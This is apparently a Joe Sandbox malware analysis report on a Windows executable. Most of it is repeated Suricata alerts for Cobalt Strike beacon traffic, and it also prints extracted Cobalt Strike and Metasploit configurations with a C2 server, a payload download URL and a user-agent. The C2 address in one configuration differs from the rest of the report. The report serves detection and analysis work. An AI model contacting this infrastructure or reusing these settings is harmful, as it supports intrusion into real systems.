            2025-01-09T18:30:43.075619+010020337131Targeted Malicious Activity was Detected192.168.2.45019547.121.190.12181TCP
            2025-01-09T18:30:44.161599+010020337131Targeted Malicious Activity was Detected192.168.2.45019647.121.190.12181TCP
            2025-01-09T18:30:45.267489+010020337131Targeted Malicious Activity was Detected192.168.2.45019747.121.190.12181TCP
            2025-01-09T18:30:46.395167+010020337131Targeted Malicious Activity was Detected192.168.2.45019847.121.190.12181TCP
            2025-01-09T18:30:47.489212+010020337131Targeted Malicious Activity was Detected192.168.2.45019947.121.190.12181TCP
            2025-01-09T18:30:48.584030+010020337131Targeted Malicious Activity was Detected192.168.2.45020047.121.190.12181TCP
            2025-01-09T18:30:49.749509+010020337131Targeted Malicious Activity was Detected192.168.2.45020147.121.190.12181TCP
            2025-01-09T18:30:50.825078+010020337131Targeted Malicious Activity was Detected192.168.2.45020247.121.190.12181TCP
            2025-01-09T18:30:51.905056+010020337131Targeted Malicious Activity was Detected192.168.2.45020347.121.190.12181TCP
            2025-01-09T18:30:52.958821+010020337131Targeted Malicious Activity was Detected192.168.2.45020447.121.190.12181TCP
            2025-01-09T18:30:54.034038+010020337131Targeted Malicious Activity was Detected192.168.2.45020547.121.190.12181TCP
            2025-01-09T18:30:55.273037+010020337131Targeted Malicious Activity was Detected192.168.2.45020647.121.190.12181TCP
            2025-01-09T18:30:56.360769+010020337131Targeted Malicious Activity was Detected192.168.2.45020747.121.190.12181TCP
            2025-01-09T18:30:57.441619+010020337131Targeted Malicious Activity was Detected192.168.2.45020847.121.190.12181TCP
            2025-01-09T18:30:58.528080+010020337131Targeted Malicious Activity was Detected192.168.2.45020947.121.190.12181TCP
            2025-01-09T18:30:59.657407+010020337131Targeted Malicious Activity was Detected192.168.2.45021047.121.190.12181TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-09T18:26:57.140796+010020354421A Network Trojan was detected47.121.190.12181192.168.2.449730TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: k2vUsu5VZ5.exeAvira: detected
            Found malware configuration
            Source: 00000000.00000002.4094451143.0000000000160000.00000020.00001000.00020000.00000000.sdmpMalware Configuration Extractor: CobaltStrike {"C2Server": "http://7.121.190.121:81/r9dN", "User Agent": "User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0; Touch)\r\n"}
            Source: 00000000.00000002.4094451143.0000000000160000.00000020.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Metasploit {"Headers": "User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0; Touch)\r\n", "Type": "Metasploit Download", "URL": "http://47.121.190.121/r9dN"}
            Multi AV Scanner detection for submitted file
            Source: k2vUsu5VZ5.exeReversingLabs: Detection: 78%
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: k2vUsu5VZ5.exeJoe Sandbox ML: detected
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_03881184 CryptAcquireContextA,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,0_2_03881184
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_038B0020 CryptGenRandom,0_2_038B0020
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_0389780C malloc,_snprintf,FindFirstFileA,free,malloc,_snprintf,free,FindNextFileA,FindClose,0_2_0389780C
            Source: C:\Users\user\Desktop\k2vUsu5VZ5.exeCode function: 0_2_03890F28 malloc,GetCurrentDirectoryA,FindFirstFileA,GetLastError,free,free,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose,0_2_03890F28

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49739 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49735 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49736 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49732 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49733 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49737 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49758 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49749 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49751 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49753 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49763 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49743 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49761 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49756 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49746 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49777 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49778 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49780 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49776 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49779 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49766 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49759 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49774 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49742 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49769 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49785 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49754 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49789 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49801 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49775 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49762 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49734 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2035442 - Severity 1 - ET MALWARE Successful Cobalt Strike Shellcode Download (x64) M1 : 47.121.190.121:81 -> 192.168.2.4:49730
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49786 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49731 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49757 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49740 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49795 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49830 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49824 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49818 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49837 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49760 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49770 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49767 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49807 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49841 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49787 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49765 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49849 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49873 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49782 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49771 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49893 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49863 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49886 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49909 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49741 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49902 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49932 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49783 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49856 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49764 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49879 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49916 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49738 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49781 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49955 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49963 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49971 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49939 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49978 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49755 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49988 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49768 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49926 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49772 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49996 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49773 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50005 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50012 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50020 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50028 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50042 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49948 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50035 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50060 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50051 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50068 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50076 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50095 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50094 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50097 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50101 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50103 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50102 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50100 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50105 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50115 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50083 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50112 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50119 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50118 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50110 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50107 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50113 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50136 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50106 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50138 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50093 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50125 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50120 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50150 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50134 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50155 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50139 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50121 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50160 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50159 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50098 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50162 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50149 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50173 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50156 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50183 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50128 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50166 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50124 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50099 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50193 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50175 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50194 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50154 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50143 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50181 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50109 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50202 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50114 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50129 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50144 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50164 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50171 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50185 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50187 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50172 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50203 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50190 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50146 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50131 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50191 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50189 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50201 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50199 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50108 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50132 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50142 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50135 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50137 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50161 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50104 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50141 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50168 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50208 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50127 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50152 -> 47.121.190.121:81
            Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50210 -> 47.121.190.121:81
